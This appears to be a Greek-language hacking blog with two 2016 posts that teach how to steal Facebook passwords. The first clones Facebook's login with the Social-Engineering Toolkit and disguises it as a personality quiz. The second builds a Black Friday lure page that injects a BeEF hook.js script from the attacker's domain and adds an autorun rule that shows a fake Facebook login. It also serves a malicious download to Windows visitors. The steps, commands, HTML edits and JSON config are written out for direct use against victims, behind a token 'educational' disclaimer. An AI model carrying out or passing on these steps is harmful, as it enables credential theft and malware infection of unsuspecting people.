ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι

Πέμπτη, 22 Δεκεμβρίου 2016

Πως κλεβουμε κωδικους Facebook(Phising your Ego Attack)



Σε αυτο τον οδηγο θα μαθουμε την επιθεση Phising your Ego

Γιατι εδωσα αυτη την ονομασια θα καταλαβετε στο τελος του οδηγου


Τι θα χρειαστειτε;

1.Kali Linux
2.Domain name

Πηγαινουμε εδω κανουμε εγραφη και καταχωρουμε ενα domain name


οταν επιλεξετε checkout θα σας παει εδω

ανοιγουμε ενα τερματικο και γραφουμε

curl ipinfo.io


σημειωνουμε την εξωτερικη μας ip

τωρα πηγαινουμε πισω στο freenom και επιλεγουμε use dns και βαζουμε την εξωτερικη μας ip


επιλεγουμε continue αποδεχομαστε τους ορους και επιλεγουμε complete order

περιμενουμε περιπου 5-10 λεπτα ωστε να γινει η ανακατευθυνσει του domain name στην εξωτερικη μας ip

το δικο μου domain name ειναι find-out.ml

για να το επιβεβαιωσουμε γραφουμε ping find-out.ml εσεις κανετε ping το δικο σας

αν δειτε οτι εμφανιζετε η εξωτερικη σας ip τοτε εχει γινει η ανακατευθυνσει

πχ


τωρα πηγαινουμε στο router μας http://192.168.1.1 η http://192.168.2.1 η http://192.168.1.254 βαζουμε το ονομα χρηστη και κωδικο πηγαινουμε firewall και επιλεγουμε DMZ εκει θα επιλεξουμε enable και θα βαλουμε την εσωτερικη μας ip

για να δουμε την εσωτερικη μας ip απλα γραφουμε σε ενα τερματικο ifconfig


πχ η δικια μου ειναι 192.168.1.2

τωρα θα χρησιμοποιησουμε το SET(Social engineering Toolkit) για να κλωνοποιησουμε την σελιδα του facebook

οποτε γραφουμε σε ενα τερματικο setoolkit



επιλεγουμε 1 Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner

το SET θα μας ρωτισει την ip που θα μας στελνουν τα αποτελεσματα εμεις βαζουμε το domain name μας


και γραφουμε την σελιδα που θελουμε να κλωνοποιησουμε

πχ

παταμε enter και το SET θα αντιγραψει την σελιδα του facebook και θα ξεκινισει τον apache server μας

εμεις παταμε ctrl+c ωστε να βγουμε απο το SET

τωρα στην διαδρομη /var/www/html του apache θα δουμε 3 αρχεια το ενα index.html ,post.php και harvester-(με ημερομηνια/ωρα).txt

με την εντολη mv /var/www/html/index.html /var/www/html/login κανουμε μεταονομασια του αρχειου index.html σε login

πηγαινουμε στον φακελο 

τωρα  εφοσον ειμαστε στο browser μας (περιηγητη) παταμε ctrl+shift+P για να παμε σε μυστικη λειτουργεια (igognito mode)



 γραφουμε πανω στην url http://el.nametests.com


διαλεγουμε ενα test που πιστευετε οτι θα τραβηξει τα θυματα σας πχ εγω διαλεξα μιας και ειναι και επικαιρο

παταμε shift + print screen θα μας εμφανισει εναν σταυρο και επιλεγουμε το πλαισιο της εικονας αυτο στην ουσια ειναι print screen με αποκοπη οποτε εμεις θελουμε να βγαλουμε μονο αυτο

η εικονα θα εχει αποθηκευτει στον φακελο pictures εμεις βρισκουμε την εικονα την μετα ονομαζουμε σε pic.jpg απο .png 

και την μεταφερουμε στον φακελο /var/www/html/

τωρα πηγαινουμε στην σελιδα nametests και παταμε ctrl+u για να δουμε τον κωδικα της σελιδας

παταμε ctrl+a για να τον επιλεξουμε ολο και ctrl+c για αντιγραφη


γραφουμε σε ενα τερματικο leafpad /var/www/html/index.html και κανουμε επικολληση του κωδικα που αντιγραψαμε πριν

πχ


πριν αποθηκευσουμε κανουμε τις εξεις αλλαγες

διαγραφουμε αυτες τι γραμμες


<meta property="fb:admins" content="1************"/>
<meta property="fb:admins" content="1************"/>
<meta property="fb:app_id" content="1************"/>


αλλαζουμε τις γραμμες
<meta property="og:site_name" content="nametests.com"/>
σε
<meta property="og:site_name" content="domain name sas"/>
μετα
<meta name="author" content="nametests">
σε
<meta name="author" content="domain sas">
μετα
<meta property="og:url" content="http://el.nametests.com/test/ti-tha-pareis-apo-ton-agio-basile/14969/"/>
σε
<meta property="og:url" content="http://domain name sas/index.html"/>
μετα
<meta property="og:image" content="//image.nametests.com/promote_image/2016/11/30/67503e29aaa1afgdserfs9978a3d8a42d7.jpg"/>
σε
<meta property="og:image" content="http://domain name/pic.jpg"/>

μετα
loginURL_basicperms: '/accounts/facebook/login/?scope=email%2Cpublic_profile&next=/test/ti-tha-pareis-apo-ton-agio-basile/14969/%3Fstart%3D1',
loginURL_postperms: '/accounts/facebook/login/?auth_params=auth_type%3Drerequest&scope=PERMSLIST&next=/test/ti-tha-pareis-apo-ton-agio-basile/14969/%3Fstart%3D1'

πριν αλλαξετε το

loginURL_postperms: '/accounts/facebook/login/?auth_params=auth_type%3Drerequest&scope=PERMSLIST&next=/test/ti-tha-pareis-apo-ton-agio-basile/14969/%3Fstart%3D1'

καντε το αντιγραφει

ανοιγουμε το post.php και κανουμε αντικατασταση το http://www.facebook/


προσθετουμε στην αρχη http://nametests/ και κανουμε επικολληση


αποθηκευουμε το post.php

στον index.html αλλαζουμε σε

loginURL_basicperms: '/login',
loginURL_postperms: '/login'

απο
loginURL_basicperms: '/accounts/facebook/login/?scope=email%2Cpublic_profile&next=/test/ti-tha-pareis-apo-ton-agio-basile/14969/%3Fstart%3D1',
loginURL_postperms: '/accounts/facebook/login/?auth_params=auth_type%3Drerequest&scope=PERMSLIST&next=/test/ti-tha-pareis-apo-ton-agio-basile/14969/%3Fstart%3D1'

αποθηκευουμε και ειμαστε ετοιμοι

τωρα κανουμε εναν restart τον apache server μας με την εντολη

service apache2 reload

τωρα μας μενει να κοινοποιησουμε τον συνδεσμο δημοσια η σε μια ομαδα η στο προφιλ τους θυματος η στο δικο μας προφιλ


ο συνδεσμος θα ειναι http://domain name sas/

οταν καποιος πατησει στον συνδεσμο θα δει αυτο


 οταν πατησει συνδεσου στο facebook


 οταν βαλει τα κριτηρια συνδεσης του , εσεις θα τα εχετε παρει

με την εντολη tail -f /var/www/html/harvester*.txt θα βλεπετε τους κωδικους των θυματων


μετα στο θυμα θα του εμφανιστει αυτο

και μετα θα τον παει στην κανονικη σελιδα κτλ χωρις να καταλαβει τιποτα

Με την συγκεκριμενη μεθοδο 8/10 ατομα την πατανε.

Η επιθεση πηρε αυτο το ονομα γιατι οι ποιο πολλοι χρηστες του διαδικτυου παντα θελουν να εξωτερικευουν το εγω τους  στα social media ,αυτο βεβαια εχει σαν αντικτυπο να βγαζουν στην φορα την προσωπικη τους ζωη και να βοηθανε κακοβουλους χρηστες να εφαρμοσουν την τεχνη της κοινωνικης μηχανικης εναντιον τους.

Η συγκεκριμενη σελιδα που κλωνοποιησα σου περνει το access token απο το facebook ....το access token ειναι στην ουσια το email και ο κωδικος σας ......οποτε ο ιδιοκτητης της εφαρμογης μπορει να λαμβανει διαφορες πληροφοριες απο το προφιλ σας οπως αναγνωση μηνυματων η ακομα να κοινοποιει διαφορα χωρις να το γνωριζετε.Οποτε σε κανει να αναρωτιεσε τι ειναι ποιο σωστο......να περνει τα στοιχεια σου ενας κακοβουλος χρηστης η ο προγραμματιστης της εφαρμογης?

Πέμπτη, 1 Δεκεμβρίου 2016

Πως εκμεταλλευομαστε τα κοινωνικα δρωμενα για μια στοχευμενη επιθεση (Black Hat Method)



Tι θα χρεαστειτε;

1.Kali Linux
2.BeEF
3.Veil-Evasion
4.Domain name
5.Μυαλο

Σε αυτον τον οδηγο θα μαθουμε την τεχνη της κοινωνικης μηχανικης και πως μπορουμε να εκμεταλευτουμε τα κοινωνικα δρωμενα μιας χωρας ωστε να εφαρμοσουμε κακοβουλα τον σκοπο μας.Θα ειναι συντομος οδηγος και με λιγες λεπτομερειες καθως θελω να σας δειξω την μεθοδο και οχι την εγκατασταση αυτης της επιθεσης.

Αυτη την στιγμη τα κοινωνικα δρωμενα της χωρας ειναι οι λεξεις κλειδια

Τελη κυκλοφοριας
Donald Trump
Barack Obama
Φορος ΕΝΦΙΑ
και Black Friday

Απο τα παραπανω αν φτιαξω εναν δολο σε ιστοσελιδα, θα στοχευσω μια συγκεκριμενη ομαδα ατομων μια καποια μικρη αποκλιση

δλδ αν φτιαξω μια ιστοσελιδα με τιτλο  "Τοσο πρεπει να πληρωσετε αν εχετε 150 τετραγωνικα και πανω!!!!" η "ο Νεος φορος ΕΝΦΙΑ" θα τραβηξω ηλικιες απο 28-60+

η αν φτιαξω μια ιστοσελιδα με τιτλο "Πανικος στα πολυκαταστηματα!!!80% οι τσαντες louis vitton" προφανως θα στοχευσω καθαρα γυναικες ηλικιας 18 εως 38+
πιστευω οτι εχετε καταλαβει πως να στοχευετε συγκεκριμενα ατομα κτλ

εγω στο παραδειγμα μου θα χρησιμοποιησω ,μιας και σημερα που γραφω τον οδηγο ειναι παρασκευη τις εκπτωσεις Black friday που εγινε σαλος στην Ελλαδα....

οποτε κανω μια αναζητηση "Black Friday" και βρισκω μια οποιαδηποτε ιστοσελιδα που να λεει καποιο αρθρο

πχ





τωρα προφανως δεν προκειτε να κατσω να γραψω ολοκληρη ιστοσελιδα οποτε σε αυτο θα με βοηθησει το εργαλειο httrack το οποιο ειναι ενα εργαλειο που αντιγραφει ιστοσελιδες για offline αναγνωση.

οποτε εγω επελεξα την ιστοσελιδα ταδε και πηγα στο αρθρο για black friday



οποτε τρεχω την εντολη httrack oloklhro_to_url_ths_istoselidas_me_to_arthro -o /root/var/html/istoselida

και το httrack αντιγραφει ολη την ιστοσελιδα στον φακελο του apache server


τωρα καταχωρουμε ενα domain name και το ανακατευθυνουμε στην εξωτερικη ip μας επισεις προωθουμε την θυρα 3000 και θυρα 80 στην εσωτερικη  ip μας

αυτο το πως θα το κανετε δειτε σε προηγουμενους οδηγους

τωρα πηγαινουμε και βρισκουμε το αρχειο index.html και προσθετουμε μετα το </body>


<script type="text/javascript" src="http://domainname:3000/hook.js"></script>

και οπως καταλαβαινετε θα χρησιμοποιησουμε το Browser Explotation Framework (BeEF) στα kali linux υπαρχει η εκδοση 4.6.0-Alpha εγω χρησιμοποιω την εκδοση 4.7.0-Aplha οπως και να εχει δεν ειναι ο σκοπος του οδηγου μου για να μαθουμε πως το κανουμε εγκατασταση .Απλα στην 4.6.0-Alpha

πριν ξεκινησουμε γραφουμε σε ενα τερματικο leafpad /usr/share/beef-xss/modules/persistence/man_in_the_browser/config.yaml

και προσθετουμε


τωρα αν ενα θυμα ενωθει και παει σε αλλο αρθρο θα συνεχισουμε να τον εχουμε σαν zombie χωρις να επιλεξουμε αυτοματα man in the browser σχετικα με το beEF θα δειτε σε προηγουμενο οδηγο μου.

τωρα οσοι εχετε την εκδοση 4.7.0 απλα θα τρεξετε την εντολη
cp /root/beef/arerules/man_in_the_browser.json /root/beef/arerules/enabled/

η οποια αυτη η εντολη θα μεταφερει το αρχειο json με την λειτουργια man in the browser και οταν ξεκινησετε το beef θα την τρεχει αυτοματα

τωρα αλλαζουμε λιγο επικεφαλιδα και τιτλο στο αρχειο index.html ωστε να το κανουμε ποιο πικαντικο πχ


 τωρα εφοσον τα εχουμε αλλαξει ολα μας μενει να κανουμε την επιθεση

αν θελετε να βαλετα αυτοματα να κλεβει κωδικους facebook δημιουργουμε ενα εγραφο κειμενου και βαζουμε τις εξεις γραμμες

{"name": "Phising",
  "author": "nickthesail0r",
  "browser": "ALL",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "pretty_theft",
    "condition": null,
    "options": {
      "choice": "Facebook",
      "backing": "Grey",
      "imgsauce": "http://best-page.ga:3000/ui/media/images/beef.png"
    }
  }],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"

το αποθηκευουμε σαν phising.json και το βαζουμε στο φακελο του beef (εκδοση 4.7.0) arerules/enabled

αν θελετε στο φακελο arerules εχει και το win_fake_malware.json
αυτο το ανοιγουμε και αλλαζουμε το url με το url του κακοβουλου αρχειου μας
*εννοειτε οτι εχουμε φτιαξει καποιο κακοβουλο αρχειο και εχουμε προωθησει τις αναλογες θυρες στο router μας


ξεκιναμε το beef με την εντολη ./beef οταν ειμαστε στον φακελο beef

πχ


κανουμε μια δημοσιευση της σελιδα μας στο facebook και περιμενουμε......

οταν τα θυματα πανε στην ιστοσελιδα μετα απο λιγο θα τους εμφανιστει να βαλουν τα στοιχεια του facebook


και αν καποιος μπει απο windows θα δει αυτο και θα κατεβασει το κακοβουλο αρχειο


Με λιγα λογια σε αυτον τον οδηγο απλα μαθαμε πως να πραγματοποιουμε μια επιθεση με την τεχνη της κοινωνικης μηχανικης.....σε παλιοτερους οδηγους μου θα δειτε τι μπορειτε να κανετε με το BeEF και πως μπορειτε να το εκμεταλευτειτε.
Σας συνιστω να διαβασετε το ARE (Autorun Rule Engine) του BeEF ετσι ωστε να μπορεσετε να φτιαξετε την επιθεση στα μετρα σας.